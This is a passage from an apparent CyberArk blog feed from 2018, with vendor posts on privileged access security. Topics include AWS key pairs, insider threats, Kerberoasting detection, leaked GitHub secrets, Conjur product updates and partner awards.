Furthermore, CyberArk has developed a programmatic approach designed to help organizations protect themselves by establishing and maintaining strong privileged access security hygiene. The CyberArk Privileged Access Security Hygiene Program leverages the extensive experience the CyberArk Security Services team has gained from responding to significant data breaches, including many large Canadian organizations. These breaches have resulted from some of the most common attacks on privileged access, providing valuable insights into how attackers operate and exploit an organization’s vulnerabilities.

This mandate, alongside many other recent pieces of legislation that have come out recently, is a giant step in the right direction in the world of security. Providing people with more control over their own personal data is a good thing. Notifying said people when personal data becomes compromised is even better. If we learn from history, consider the words of Abraham Lincoln, “Honesty is the best policy.” That statement certainly rings true today in requiring organizations to be more forthcoming in the event of a breach. The updates made to the Canadian Digital Privacy Act will undoubtedly force businesses to rethink their security strategy; strengthening their security controls to mitigate risk against a personal data breach. In the end, everyone wins.

You can review the changes in this very brief announcement sent out by Her Excellency the Governor General in Council or find more details summarized here.

Be sure to reach out to your local sales representative or contact us to see how we can help support compliance with this privacy act and many others.

]]>
How to Handle “Office Space” Moments and Move Forward with Your Privileged Access Security Program https://www.cyberark.com/blog/how-to-handle-office-space-moments-and-move-forward-with-your-privileged-access-security-program/ Thu, 02 Aug 2018 21:10:14 +0000 https://www.cyberark.com/?p=26505

One of the most well-known characters from the cult-classic movie “Office Space” is Milton Waddams, who famously uttered, “I don’t care if they lay me off…but it is not okay if they take my stapler!” Sometimes it feels like security teams are dealing with similar challenges, as executive leadership questions program expenditures or users balk at changing daily routines to support the greater goal of reducing privileged access-related security risks. If you’ve ever fought the urge to take a bat to your office printer (or computer… or entire data center, for that matter), this blog post is for you.

At CyberArk Impact Americas 2018, a popular “Defense Strategy” breakout session featured a CyberArk customer panel – with participants sharing their own real-life “Office Space” moments. Here’s a look back at some highlights of the discussion. Names have been withheld to protect these hard-working security leaders who have never once thought about setting their office on fire.

Mmmmmmk…yeah…we’re going to need to go ahead and secure our privileged accounts

How to build the business case for prioritizing a privileged access security initiative

The security engineer at a government technology services provider joined the organization as it was beginning its journey to the cloud, and the expectations around security, reliability and seamless integration were high. This pressure to deliver was compounded by heightened security mandates and regulations for the handling of classified information. Yet the legacy privileged access management system he had inherited kept failing, forcing him and his team to come into the office on nights and weekends for emergency fixes with increasing regularity.

He saw a critical need to invest in a strong privileged access security platform that could grow with the organization’s needs and scale to meet future use cases, but he knew getting executive leadership on board for a full rip-and-replace would be a challenge. To help build a compelling business case for change, he calculated the operational cost of this near-constant triage – a staggering $160,000 in extraneous personnel hours per year. This certainly got management’s attention, and he soon had the approvals necessary to move forward with privileged access security vendor evaluations. After an extensive evaluation process, the team selected the CyberArk Privileged Access Security Solution.

As is often the case during times of significant change, the engineer faced some initial internal pushback around the legacy system replacement. However, he was able to quickly alleviate fears by demonstrating CyberArk’s ability to meet current and future requirements along each step of the organization’s projected roadmap. The organization’s application development team was particularly impressed with the solution’s low latency, quickly realizing how it could help them to improve their security posture without hindering application development and delivery.

We need to talk about your flair

How to broaden your organization’s use of privileged access security across more parts of the organization

A string of acquisitions brought valuable new technologies and business models to a large software development company, further driving the company’s culture of accelerating innovation. However, a distributed environment coupled with a pervasive “startup mentality” presented numerous challenges for the security team. Without a centralized privileged access security solution in place, teams often took matters into their own hands, leveraging their own disparate security tools, automating and “fixing” workflows without security in mind, and even developing their own password vaulting tools. While this proactivity and overall intent was applauded, this security leader and his team needed a way to educate employees about privileged access security best practices, along with the CyberArk solutions available to them.

To drive broad awareness across groups, the security team partnered with the organization’s communications team and developed articles for the company newsletter, along with a number of how-to blog posts and wiki updates. They didn’t stop there. They also organized an internal workshop series to introduce different departments and geographies to CyberArk. Some sessions were designed for existing CyberArk users who needed a refresher (but perhaps didn’t realize it). Rather than telling them what to do, the focus of the session was on asking them what they were trying to accomplish – and why. This approach fostered a collaborative, two-way dialogue enabling the security team to empower users while also training them on best practices, processes, new features and use cases. This strategy has significantly helped to boost awareness and adoption of the privileged access security solution and has also helped business teams realize increased operational efficiency through simplified workflows and processes.

I believe you have my passwords

How to turn privileged access security skeptics into advocates

This security leader overseeing privileged access security initiatives at a global provider of risk, retirement and health solutions is no stranger to pushback. Change can be hard and preconceived notions are strong. A perfect example of this came to him one day in the form of an email, in which a stakeholder expressed skepticism around an impending privileged access security program rollout.

The security leader took time to consider that person’s perspective and then crafted his reply. In it, he stressed the unique opportunity the stakeholder – and organization as a whole – had to tailor this new implementation to their specific needs and pain points. He underscored his focus on collaboration, usability and performance, and invited a further discussion to address the person’s concerns – which the stakeholder readily accepted. The positive dialogue that followed was the first in a series of conversations that cultivated a strong privileged access security program champion for the organization.

The security leader took away three key learnings from this interaction. First, it’s important to practice and polish your pitch, so that you can communicate your vision for your privileged access security program in a compelling, confident way. Second, stop talking and really listen to what stakeholders say. Then, go beyond listening to ensure their needs are taken into consideration, while also demonstrating how the vision will equate to tangible benefits and improvements. Third, take the time to truly engage with them to gain their trust, alleviate fears, provide strong evidence (i.e. analyst reports, industry studies, etc.) and documentation (i.e., defined templates, scoping documentation, how-to’s, etc.) to support the privileged access security program’s vision, and most importantly, form a collaborative relationship so that privileged access security tools and workflows are optimized to meet their needs.

Want more tips on building a business case for your privileged access security program and getting stakeholders to give up their old “staplers” for something much better? Check out the CISO View report, “The Balancing Act: The CISO View on Improving Privileged Access Controls.”

 

]]>
AWS Key Pairs: One Ring to Rule Them All https://www.cyberark.com/blog/aws-key-pairs-one-ring-to-rule-them-all/ Tue, 31 Jul 2018 13:09:55 +0000 https://www.cyberark.com/?p=26438

The advent of cloud computing has fundamentally changed the way we now think of modern data centers. Dynamic, elastic in nature and fully automated, cloud is well-suited for almost everything to be delivered ‘as code.’ Despite all of the benefits, there are also inherent and ever-growing risks in the cloud that are typically absent from the on-premises world.

The use of privileged accounts may be slightly different in cloud instances, and they are equally important to protect. Not only does a cloud platform have its own privileged accounts and secrets, but the regular *NIX and Windows instances maintain their own as well – from privileged SSH keys to a local administrator account. Regardless, to secure these powerful credentials, they must to be managed and accessed with a privileged access security solution.

Privileged Challenges in Elastic and Dynamic Cloud Environments

An AWS Key Pair is very much like the “One Ring” in the Lord of the Rings series. Designed to establish total domination over the people of Middle Earth, the Dark Lord Sauron forged the One Ring in the fires of Mount Doom, giving him great and magical powers. The ring was essentially woven directly into his being, totally bound to it, providing him with great power but also leaving him vulnerable and powerless without it.

The AWS Key Pair is not so different from the One Ring – the key pair controls access to the AWS environment and can be used to decrypt the local administrator password for Windows OS, as well as the private SSH key for *NIX systems. In most cases, key pairs used for a single AWS region are very limited.

Like the One Ring, the key pair literally holds the “rings of power” (or more accurately, the “keys of power”) to your entire cloud kingdom. Having the key pair is a crucial step in gaining access to the entire IaaS environment. If this were the case in the Lord of the Rings, it would’ve made Frodo’s quest to destroy the Ring a lot easier – and uneventful. If the gates of Mordor were the IaaS environment, he could’ve walked straight through and casually chucked the One Ring into the fires of Mount Doom with ease.

Once the key falls into the wrong hands, it exposes your entire IaaS to potential attacks. Attackers constantly seek the types of secrets that can be used to access your organization’s environment. When you create a key pair, it is automatically downloaded on to your workstation. So in a case where there is already an attacker inside the network waiting for someone to slip, your key pairs are exposed and it’s game over.

You can create more than one key, but the problem remains the same, and with multiple key pairs, the challenge becomes storing and managing multiple pairs of keys.

How Do I Solve This Problem?

There are a couple of options depending upon the needs of your organization. For example, you can use a privileged access security solution to manage your IaaS privileged accounts. You can (and should) even build this process directly into your own CI/CD pipeline. Although, you’ll likely need to make some changes in the process and add new integrations – DevOps and containers present another potential set of vulnerabilities and a potentially enlarged attack surface. As DevOps and/or containers become increasingly important to businesses, it is critical to secure these environments too. For example, you will need to onboard credentials, secrets and other privileged accounts for each new EC2 compute instance and de-provision them once the instance is terminated.

Often a better solution is to completely automate the process of securely onboarding the credentials of newly created instances, so that you never have to expose the credentials again after deployment and configuration.

Event-Driven Automatic Onboarding

Until an organization secures its CI/CD pipelines, it is exposed to a variety of attack vectors. To address this reality, CyberArk offers an open source AWS Automatic Onboarding tool available on GitHub, which is designed to solve this exact problem for AWS customers. The solution is based on Lambda functions, which are automatically triggered by AWS CloudWatch when new instances are spun up or down.  AWS CloudWatch is able to detect a new instance regardless of who or what created it, including instances from the CLI or with AWS Autoscaling. No matter who created the instance or where it was created, CyberArk can detect it. The Lambda functions automatically onboard the privileged SSH keys or local administrator accounts to the CyberArk Privileged Access Security Solution, and then trigger an immediate rotation of the password/SSH key. This ensures the key pair can no longer be used to gain a privileged access to your environment.

Problem solved? Not entirely. What about the key pair?  It’s still a problem. One of the Lambda function’s capabilities can automatically create a key pair for you and store it directly in the CyberArk Enterprise Password Vault. With this approach, we can make sure it is never downloaded to the developer’s endpoint devices, and all access to it is through the Lambda function.

One important benefit to this approach is that unlike schedule-based scanners that provide you a partial view into your environment, this is an event-driven solution that is always aware of the current environment. Here, changes are made in real time.

Let CyberArk Help You in Your Quest for a Better Security Posture

The AWS Automatic Onboarding tool is packaged as a CloudFormation template, which fully automates the deployment. We recommend the deployment of this template for all AWS accounts and across all regions, which fully supports all CyberArk environments in both cloud and hybrid architectures.

It’s a security best practice to make sure that AWS Key Pairs are managed and secured, not left lying around locally on a computer or some other server. It is also a best practice to identify and manage all privileged accounts, cloud secrets and other credentials that are categorizes as “privileged.”

Change, especially technological change, is certainly welcomed and undoubtedly can deliver many great benefits, but it’s critical to ensure that you’re doing everything you can to protect your most valuable assets that leverage new technologies. CyberArk can be your Samwise Gamgee – only more reliable and capable – in your quest for securing and managing AWS Key Pairs and beyond. Contact your local CyberArk sales representative for details. To protect DevOps environments, try CyberArk Conjur Open Source at www.conjur.org

 

]]>
Insider Threats Come In All Shapes and Sizes https://www.cyberark.com/blog/insider-threats-come-in-all-shapes-and-sizes/ Fri, 27 Jul 2018 14:54:34 +0000 https://www.cyberark.com/?p=26418

Verizon’s 2018 Data Breach Investigation Report indicates that 68 percent of data breaches take two or more months to uncover, highlighting the importance of having strong, yet manageable, audit trails as well as robust detection tools in place. The study also mentions that while insider threats comprise only 28 percent of all data breaches, they are often cited as being the most costly and most difficult to prevent and detect for businesses today. There are several reasons for this, but chiefly, insiders often have knowledge of, and access to, sensitive information and can often legitimately bypass security measures without raising red flags, as they are “trusted users.”

Insider threat actors can typically be categorized into four main groups: malicious insiders, exploited insiders, external insiders and unintentional insiders. This post will focus on examples from the first group: the malicious insider. Malicious insiders are motivated by a number of underlying factors – anger, financial struggles, political activism or outside influence – so it’s not always easy to pinpoint who a potential malicious insider is, or what their particular motives are.

In a recent example, a disgruntled employee faced with an impending dismissal, subverted a company firewall to access source code data, exported it to a personal hard drive and attempted to sell it for millions of dollars in cryptocurrency. Another recent breach highlights a different flavor of insider attack, where a now ex-employee is being accused of writing software to steal internal secrets, transferring this data to third parties and doing so on three separate computers of different employees to falsely implicate those individuals to avoid scrutiny (unsuccessfully – he’s now in court). These two examples represent the types of dangerous activities that reinforce the need to have controls in place to more closely watch and remediate potentially malicious insider threats.

Before proceeding, it’s important to make two observations. First, as we know, many business users need sensitive data in order to do their jobs (for example, developers need access to the source code), but also require privileged access to log into the systems that house it. Second, every employee has some level of access to confidential information; be it through company memos, announcements, etc. – meaning that everyone inside the organization represents a potential insider threat.

It is paramount to control how information is shared, or more importantly, not shared. The objective of security tools and teams is not to make it impossible for people to do their jobs; but rather it is to ensure that proper access is granted and that sensitive information has adequate protection to prevent it from leaking. There are controls and tools that can be used to not only sound the alarm when something fishy might be occurring, but to automatically and promptly limit the damage done once a malicious insider decides to go rogue.

The CyberArk Core Privileged Access Security Solution requires that users retrieve privileged credentials from the encrypted password vault, which can be set to create and rotate complex credentials as often as policy dictates. In the event that users access systems without first retrieving a credential from the vault, CyberArk has the ability to flag this type of behavior as “suspicious” or “high risk” and administrators can manually or automatically suspend or terminate the session. This disables the threat actor from proceeding further and prevents them from connecting to the specific account, for example, a database that houses source code. With this use case, suspicious behavior is flagged to administrators and can be suspended, rather than automatically terminated. This leads to fewer headaches for operations team members. If the session is deemed to be harmless, then the session can be resumed with approval, rather than forcing users to start over.

Another way that internal users exploit security vulnerabilities is through unmanaged accounts. In many examples, internal users have accessed sensitive and valuable information through manually created backdoor accounts that don’t require the retrieval of a privileged credential. Often times this can provide unmitigated and unmonitored access that can prove catastrophic. However, the CyberArk Core Privileged Access Security Solution can automatically (or manually) be set to add unmanaged privileged accounts to the vault and create a complex password in real time, preventing further mobility. This also prohibits users from essentially creating their own paths within a network, provides adequate checks to ensure that the right access is granted and is monitored in real time to detect potentially dangerous activities. In the case of creating backdoor accounts to access privileged information, like manufacturing plans, the ability to automatically onboard these accounts with CyberArk Privileged Threat Analytics would have created a new credential while the actor was inside, essentially trapping them in the session with nowhere to run or hide.

It’s hard to know if an employee may turn rogue, and it’s even harder to know who might fall victim to an attack and have their accounts exploited. To effectively protect against insider threats, organizations must first understand who has privileged access to which systems. From there, they should minimize user privileges using the principle of least privilege to reduce the attack surface, lock down privileged credentials, and control and monitor privileged accounts. Technology can also help to identify and alert on anomalous behavior.

Learn how CyberArk can help your organization reduce the risk of malicious insider threats and limit potential damage by downloading our eBook, contacting your local CyberArk sales representative or reaching out to us for a demo to see some of the functionality highlighted in this blog in a live environment.

]]>
What Harry Potter Teaches Us about Constant Vigilance and Insider Threats https://www.cyberark.com/blog/harry-potter-teaches-us-constant-vigilance-insider-threats/ Wed, 25 Jul 2018 20:45:52 +0000 https://www.cyberark.com/?p=26306/

The character of Mad Eye Moody in “Harry Potter and the Goblet of Fire” preached “constant vigilance” against dark wizards, even as he was a villain in disguise. The real Mad Eye Moody had been kidnapped and locked in a trunk for an entire year, while an imposter assumed his form and took on his role as the defense against the dark arts teacher at Hogwarts School of Witchcraft and Wizardry. Not only was he an imposter, but he was a dark wizard, one of Lord Voldemort’s most loyal followers determined to take Harry out and restore Voldemort to full power.

“Constant vigilance” is sage advice for businesses too. With the threat of malicious insiders, undetected attackers moving around a network and other risks to mitigate, there is no “one-and-done” solution in security. Industry research such as the 2018 Verizon Data Breach Investigations Report (DBIR) helps the collective community keep an eye on trends and glean insights from lessons learned to get ahead of potential vulnerabilities before they become problems. A few key trends identified in the report caught my eye.

In manufacturing, notable trends include targeted attacks and intellectual property theft.  According to the report, cyber espionage accounted for 31 percent of all breaches in manufacturing. This number is down from last year, but cyber espionage remains a very real threat to the industry. Attackers go after manufacturing targets with a specific purpose in mind, choosing victims with valuable trade secrets and intellectual property. Once this sensitive information has been exfiltrated, competitors can use it against the victim on the market—a different approach than directly siphoning funds, but still ultimately results in financial gain for the attackers.

In the healthcare industry, the story of the year (keeping in line with previous years) is not just about outside attackers, but about insiders as well. Ransomware remains prevalent, though not at the constant onslaught that many people perceive. According to the report, most companies receive malware on six or fewer days a year. However, it only takes ONE successful ransomware attack to bring an organization to its knees. And while the security industry tends to focus on data being stolen by outside attackers, it’s important to pay attention to what is going on within the organization as well. This year’s report indicates there are many cases in which employees are misusing their accounts, whether intentionally or by accident. As such, employees with access to data beyond their role within the organization can become problematic.

Within healthcare, the report notes that employees sometimes misuse their credentials to access information they do not need in order to accomplish their tasks. For example, employees might search for a celebrity patient’s records out of curiosity, or “just for fun.” This type of activity underscores the importance of following least privilege principles, coupled with application control, as well as implementing privileged session monitoring capabilities. For even without malicious intent, the misuse of credentials can be just as damaging as stolen credentials, causing compliance and regulatory violations.

Many parts of the report apply across industries. While the report indicates that 78 percent of people didn’t click on a single phishing link all year (which is promising news), phishing and pretexting remain popular attack methods. Attackers only need one employee to click a link and open the door for the attacker to enter. Once an attacker has stolen credentials, they can maneuver within the network, escalating levels of privilege until they have the access they need to wreak the havoc they intend.

The report’s emphasis on education—making sure that employees are trained to identify and report social attacks such as phishing—is one important line of defense. Knowing what to look for is half the battle. However, it is imperative to have a strategy beyond education that prioritizes privileged access security. It remains just as important now as in recent years to practice least privilege principles along with privileged access management. Together, this provides businesses with a dramatically reduced attack surface. A focus on privileged access security  hygiene is also critical for an effective cyber security program. Tactics such as multi-factor authentication, vaulting and rotating sensitive credentials can help protect powerful accounts within the organization.

In the wizarding world, posting Dementors at the gates and hoping for the best simply isn’t enough. We can only hope that Hogwarts re-evaluated security in the post-Harry Potter era, considering the number of times Lord Voldemort and his cronies managed to break through the castle walls, sometimes even completely undetected. Cyber security is not magic. It takes strategy, planning and collaboration to reduce cyber security risk.  Not only must we be able to recognize the attackers outside the organization, but we must also guard against overreaching scope and seemingly innocent employees from becoming the attacker within. “Constant vigilance” includes protecting privileged access from the dark wizards of the cyber world. Contact us to learn more about how to protect your castle from the threat of dark cyber wizards.

]]>
2018 CyberArk Americas Partner Excellence Awards Announced at Impact https://www.cyberark.com/blog/2018-cyberark-americas-partner-excellence-awards-announced-impact/ Fri, 20 Jul 2018 20:15:38 +0000 https://www.cyberark.com/?p=26254/

This week we convened the largest gathering of privileged access security practitioners, technology partners and subject matter experts ever at CyberArk Impact Americas 2018.

Held in Boston, this 12th annual event underscores our “security is a team game” philosophy.  The event provided an opportunity for customers to: share their in-the-trenches experience and tech insights; spend one-on-one time with privileged access security experts addressing questions, challenges and unique approaches; obtain hands-on product instruction and deep technical training. It’s also a venue to socialize with – and learn from – industry peers.

Regardless where customers are in their privileged access security journey, there was something for everyone on the jam-packed agenda. Over the course of three days, attendees explored the future of security with CyberArk leaders, dissected recent attacks and advanced attack methodologies; discovered new defense strategies; and dug into technical demonstrations of CyberArk solutions and partner technologies.

The resounding theme across each session and demonstration was the critical need for strong cyber security hygiene and a systematic, risk-based approach to address organizations’ top control goals – from eliminating irreversible network takeover attacks to defending DevOps secrets in the cloud and on-premises.

CyberArk partners were also well represented at the conference. The Impact partner pavilion – featuring representatives from SailPoint, Okta, ForeScout, KPMG, PwC, CyberSheath, Deloitte, Clango, Optiv, Cognizant and SecureITSource – provided a hands-on opportunity for customers to experience some of the many technology partnerships and integrations requested by customers, made available through the CyberArk C3 Alliance Program and featured on the CyberArk Marketplace.

Our channel partners invest heavily in developing privileged access security expertise to help companies worldwide adopt best practices for their multi-layered cyber security programs. They espouse the benefits of taking both an attack and defend approach to security programs.

To recognize our partners’ valuable contributions, we were pleased to announce the 2018 recipients of the annual CyberArk Americas Partner Excellence Awards during the show. This year’s winners are:

All Americas

  • Partner of the Year Americas – Optiv
  • Global Systems Integrator of the Year Americas – PwC
  • Growth Systems Integrator Partner Americas – Deloitte

United States

  • New Business Leader U.S. – Sirius/Forsythe
  • Growth Reseller Partner U.S. – Accudata
  • Innovative Solution Partner U.S. – SecureITSource

Canada

  • New Business Leader Canada – Ion United
  • Partner of the Year Canada – The Herjavec Group

Latin America

  • Partner of the Year Brazil – EZ Security
  • Partner of the Year Mexico – ARAME
  • Partner of the Year CCA (Central America & the Caribbean) – SISAP
  • Partner of the Year NOLA (Colombia, Venezuela, Ecuador & Bolivia) – Nemesis
  • Partner of the Year SOLA (Argentina, Chile, Peru, Uruguay & Paraguay) – Novared

These awards celebrate top CyberArk channel, systems integrator and solution provider partners in the United States, Canada and Latin America. These partners have demonstrated strengths across a variety of categories including excellence in cyber security innovation, commitment to training and skills development, and driving customer success with market-leading privileged access security solutions to help defend against sophisticated attacks.

We congratulate all of this year’s winners and look forward to our continued collaboration to shape the future of our industry and protect what matters most.

For more information, read about the CyberArk Global Partner Program.

]]>
Strengthen and Simplify Container and DevOps Security with CyberArk Conjur Enterprise V5 https://www.cyberark.com/blog/strengthen-simplify-container-devops-security-cyberark-conjur-enterprise-v5/ Tue, 17 Jul 2018 12:40:21 +0000 https://www.cyberark.com/?p=26181/

Today we’re excited to announce CyberArk Conjur Enterprise V5 and also a new Vault Synchronizer as part of our commitment to strengthen and simplify security for DevOps and container environments. The V5 release adds new enterprise-class features and capabilities to the Conjur platform, which benefits security teams, operations and developers. For example, it is now easier for developers to migrate from Conjur Open Source to Conjur Enterprise. Conjur Enterprise now includes all of the integrations with container platforms and the CyberArk Vault offered earlier this year, as well as various performance improvements and enhancements.

New features in V5 include:

  • New capability to improve AWS workload security: CyberArk Conjur utilizes the native capabilities of AWS identity and access management (IAM) roles for strong authentication, while using Conjur for policy-based authorization. This enables developers and security teams to avoid re-work and any impact on velocity by enabling Conjur-defined policies to be applied to already defined AWS IAM roles. Conjur now authenticates to any of the AWS Principles, including AWS Elastic Compute Cloud (EC2), AWS Elastic Container Service (ECS) instances, AWS Auto Scaling and Lambda functions. This new capability is available for both Conjur Enterprise and Open Source, enabling organizations using AWS and CyberArk to more securely manage access policies across AWS, hybrid, multi-cloud and CI/CD pipelines.
    Simplified transition from open source to enterprise: Conjur Enterprise V5 leverages all of the powerful features and integrations initially developed for Conjur Open Source.
  • New capabilities previously available via Conjur Enterprise are now available also via Conjur Open Source. For example, Kubernetes and Red Hat OpenShift integrations are all available for both versions of Conjur.
  • Conjur Enterprise V5 also enhances various enterprise-class capabilities including streamlining policy loading and policy management, improving master cluster performance and improved auditing features that use the industry-standard RFC 5424 protocol.

Importantly, as we’ve made multiple updates and enhancements to Conjur Enterprise over the past few months, here is a brief recap of some of the integrations:

  • Strong container security: V5 includes all the recently offered integrations with leading container platforms – including Kubernetes, OpenShift, Pivotal Cloud Foundry and Cloud Foundry. Each integration takes advantage of the container platform’s native authentication capabilities and CyberArk’s robust security and policy capabilities. This makes it easier for developers to more securely deliver secrets and other credentials in any of the leading container environments.
  • Consistently managing secrets and credentials across the entire enterprise: Together with the new Synchronizer, the V5 release improves the performance and expands the integration with the CyberArk Enterprise Password Vault. The integrated solution automatically replicates secrets between the CyberArk vault, CyberArk Conjur and any container platform or native DevOps tool integrated with CyberArk Conjur. Now with the various integrations, enterprises can manage secrets in container platforms using the same policies already established in the CyberArk Vault and applied across the enterprise. Customers gain a simplified, consistent end-to-end secrets management solution that can extend to every compute and development platform, including native tools and container platforms integrated with Conjur.

Improvements in the latest release of Conjur Enterprise demonstrate CyberArk’s continued commitment and investment in the DevOps space with the enterprise-class capabilities of Conjur Enterprise, while making the Open Source version feature rich and easily accessible to developers. It was exciting to see all the interest from our customers at the DevOps sessions at CyberArk IMPACT in Europe, just last week, and now at the training sessions at IMPACT Americas. If you haven’t already, we encourage you to reach out to the Systems Engineer assigned to your organization to learn more about Conjur, encourage your developers to try Conjur Open Source, or reach out to sales to schedule a DevOps workshop or for more information.

Additional Resources

  • To learn more about CyberArk Conjur, visit: https://www.cyberark.com/conjur
  • To learn more about Conjur support for specific container platform and AWS integrations, visit: https://docs.conjur.org/
  • A new white paper is available “Securing DevOps Environments in the Enterprise with CyberArk Conjur” from com/Resources
  • You can also take a Conjur Open Source tutorial by registering here for the hosted demo. Everyone that registers also receives our new DevOps newsletter.

 

 

]]>
Cracking Service Account Passwords with Kerberoasting https://www.cyberark.com/blog/cracking-service-account-passwords-kerberoasting/ Mon, 16 Jul 2018 11:34:54 +0000 https://www.cyberark.com/?p=26166/

Threat detection is a hot topic in security today. By now, most recognize it’s important to manage administrative rights and take a centralized approach to security so as not to mismanage (or lose track of) older systems and applications. However, today, there are new considerations. Keberoasting has emerged as a way attackers exploit Windows authentication protocol without the need to access an administrative account.

Kerberos’ legacy implementation in the Active Directory is targeted as a key vulnerability by malicious actors. Kerberoasting in particular aims to crack passwords of service accounts and can be effective by capitalizing on human nature. It is commonplace to create simple, easy to remember passwords, especially when these are shared. Keep in mind, that these accounts do not require admin rights, they simply have to be a valid domain user.

When a privileged domain account is configured to run a service in the environment, such as MS SQL, a Service Principal Name (SPN) is assigned in the domain to associate the service with that interactive service account. However, it’s important to remember that many service accounts historically have too many administrative rights. Every least privileged user who wants to use that specific resource receives a Kerberos ticket signed with an NTLM hash of the privileged account that is running the service.

This inherently creates a vulnerability, and a malicious actor could then take the Kerberos ticket offline onto his/her attacking machine that utilizes password cracking methods such as brute force, rainbow tables, etc., until the correct service account password is discovered. From there, the attacker can utilize that service account’s cleartext password to move laterally throughout the entire network.

To identify these types of vulnerabilities, CyberArk Labs has built a tool called Zbang, which allows organizations to scan and detect risks related to: Shadow admins, Risky SPNs, SID histories, Skeleton Keys and Delegation. Zbang helps organizations to map out where these types of vulnerabilities exist. That information can then be digested by IT admins and  onboarded into the CyberArk Privileged Access Security Solution, which is able to detect suspicious activity occurring with service accounts, as well as highlight and manage these risky SPNs — accounts that are at high risk for a Kerberoasting attack.

In the demo video below, we walk through a Red Team / Blue Team example of a real time Kerberoasting attack. The Red Team member uses John the Ripper, a frequently used open-source software, to crack a service account password and gain unauthorized access. The Blue Team member then leverages CyberArk Privileged Threat Analytics to detect this malicious behavior and stop the attack from causing irrevocable damage to the network.

 

Request a live demo to see CyberArk Privileged Threat Analytics in action. We’ll also demonstrate Kerberoasting during CyberArk Impact 2018 in Boston from July 16-18th:

  • Deep Dive on Kerberoasting and Other Kerberos Attacks
  • More Zbang for the zBuck: How Zbang Can Be Used to Discover Hidden Risks

For more information about the Zbang tool, please reach out to your Account Team and they will be happy to provide further details and deliver the tool.

 

]]>
How to Address Vulnerabilities in Microsoft GitHub Repositories https://www.cyberark.com/blog/address-vulnerabilities-microsoft-github-repositories/ Fri, 13 Jul 2018 16:03:23 +0000 https://www.cyberark.com/?p=26159/

Microsoft’s acquisition of GitHub for $7.5 billion has raised questions about the future of GitHub’s privacy and security within the developer community. Some developers are already moving to other code version control platforms like GitLab. As Microsoft works to assuage these concerns, it’s a good time to review GitHub security concerns beyond Microsoft’s responsibility. Past breaches have proven that a private GitHub repository is not the most secure place to keep sensitive and confidential information like secrets, i.e., passwords, API keys, SSH keys and certificates. These credentials equate to access to databases, cloud instance and privileged system control consoles that contain the crown jewels of an enterprise.

The Uber breach reported in November of 2017 is a high-profile example of secrets management gone wrong. Hackers stole the personal data of 57 million customers and drivers from Uber Technologies Inc. They were able to breach Uber’s private GitHub repository and find code with imbedded secrets. With these secrets, the attackers were able to more laterally from Uber’s development environment to their production Amazon Web Services (AWS) account.  This is the same AWS account that the company used to process live company data, so it contained a lot of sensitive client information.

Uber likely has sophisticated DevOps, yet the breach reported in 2017 was not the first time Uber was hacked via secrets in GitHub. In 2014, attackers leveraged mishandled secrets in GitHub to steal the personal data of 50,000 people. In the aftermath of the 2014 breach, the ridesharing company sued GitHub for information about any users who accessed the repo page with the exposed secrets.

Uber is not alone. In the fall of 2017, Kevin Finisterre found private keys for DJIs – a Chinese drone manufacturer — web domains and AWS s3 keys publicly available in GitHub during a bug bounty program. Using this data, an attacker could access drone flight log data and any images users uploaded to DJI, including photos of government IDs, driver’s licenses and passports.  Some of the exposed flight log data was associated with government and military domains.  Ironically, the self-proclaimed “most lethal bounty hunter in the galaxy” found the keys to the kingdom in a repo called “skypixel_lottery.” Finisterre said that DJI also left some of their AWS s3 buckets open to the public, a common security mistake. This is one way to let an attacker in and weak secrets management allows them to use privileged escalation and credential theft to advance the breach.

Many of the publicly announced breaches are at companies that should know a thing or two about DevOps security. So what’s going wrong? The shift from monolithic applications, static servers and long release cycles to the dynamic, fast-paced world of DevOps has drastically changed how software is developed and deployed. However, in the race to go to market first, many organizations have not properly evaluated how they think about DevOps security.

DevOps developers now have more control over security than ever before. In many organizations, developers can check code into repositories with little to no oversight from security teams. As we saw, this code could contain access keys to production systems, secrets embedded in a file, for example. Sometimes it’s as simple as accidentally checking your own GitHub key into the source code management system. Sometimes developers falsely believe deleting the offending code solves the problem, but the leaked secrets could remain in the repo history. Truffle Hog is an open source tool that searches git repositories for secrets by digging deep into commit histories and branches.

No one should ever put any secrets into GitHub or any code repository, it doesn’t matter if it is a public, private repository or if the secrets are encrypted. Doing so increases your attack surface as anyone who can view the code will have direct access to system or infrastructure credentials that they might not be authorized to have.

According to the Twelve-factor App methodology, this is not only insecure, it is also bad application design because it introduces code dependencies on access tokens that are subject to change. This means an organization’s developers will need to change their code and rebuild their applications every time a secret needs to be rotated. Securing your secrets with a centrally managed secrets provider such as CyberArk Conjur Open Source is a step in the right direction because it manages credential rotation and security for you. However, you can remove API calls to your secrets provider with Summon, an open source command-line tool maintained by CyberArk. This is holistic secrets management solution lets developers get out of the secrets management game while allowing security teams to provide security as a service.

If you are a developer or already have a secrets management solution you might want to check out open source Summon first. Summon allows you to replace any secret or API call to a secrets vault in your code with a simple environment variable. Summon will securely inject secrets into the process at runtime without exposing or leaking the credentials. This is not only more secure, but it also abstracts the application code from the secrets management tool, making it easy to swap out secrets providers.

It’s easy to get started. Check out the CyberArk Conjur Open Source hosted tutorial for a tour of core secrets management concepts, such as storing and fetching secrets, machine authentication and authorization and security policy as code.

If you get stuck or have any feedback on our open source tools, I would love to hear from you on Slack or reach out to me on Twitter @WalshSec.

 

]]>
Securing Privileged Access within Microsoft’s Enhanced Security Administrative Environments (ESAE) https://www.cyberark.com/blog/securing-privileged-access-within-microsofts-enhanced-security-administrative-environments-esae/ Tue, 03 Jul 2018 13:40:57 +0000 https://www.cyberark.com/?p=25764/

The Microsoft Enhanced Security Administrative Environment (ESAE) is a secured, bastion forest reference architecture designed to manage the Active Directory (AD) infrastructure. This methodology focuses on “Tier 0” assets and identities, which have direct or indirect administrative control over a given AD forest and all of the assets within it, such as domain controllers, domain administrator accounts, critical servers and workstations.

 One popular technique in advanced cyber attacks is the exploitation of privileged accounts and their associated credentials to reach a Tier 0 domain controller – the central authority of trust within the Windows environment. Once a domain controller is compromised, the attacker has unrestricted access to the entire domain-joined IT infrastructure – all while eluding visibility or awareness of the organization. Based on what CyberArk has seen in the field, it can take an attacker who has hijacked a privileged credential less than 12 minutes from initial infiltration to being able to take over a domain controller, which hosts the services that constitute AD.

Critical to the overall strength of an ESAE deployment is the hardening of the control relationships among these powerful credentials, assets and humans. But managing Tier 0 assets and protecting against credential theft is demanding and difficult, particularly because organizations often try to juggle multiple account management solutions from Microsoft, including Local Administrative Password Solution (LAPS) and Microsoft Identity Manager (MIM).

CyberArk has designed practical solutions for the administration of ESAE and has been deployed alongside the architecture to maximize security and eliminate pain points by reducing administrative overhead and decreasing total cost of ownership.

